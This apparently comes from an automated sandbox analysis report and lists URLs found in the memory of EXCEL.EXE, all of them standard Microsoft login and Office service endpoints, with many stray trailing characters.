    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://lifecycle.office.com
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
    Source: EXCEL.EXE, 00000000.00000003.617145033.00000000135F7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619542500.00000000135F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755210221.0000000013610000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.767543595.0000000013612000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496136288.00000000135F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.616539559.00000000135F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504670710.0000000013610000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.575689852.00000000135F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579715376.00000000135F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.577206896.00000000135F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620082088.00000000135F7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.503378347.00000000135F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/i
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize-
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizei
    Source: EXCEL.EXE, 00000000.00000003.301259993.0000000013319000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://login.windows.local
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtesp
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeX
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeA
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeAk7
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeB
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeC
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeFj8A
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeL
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeM
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
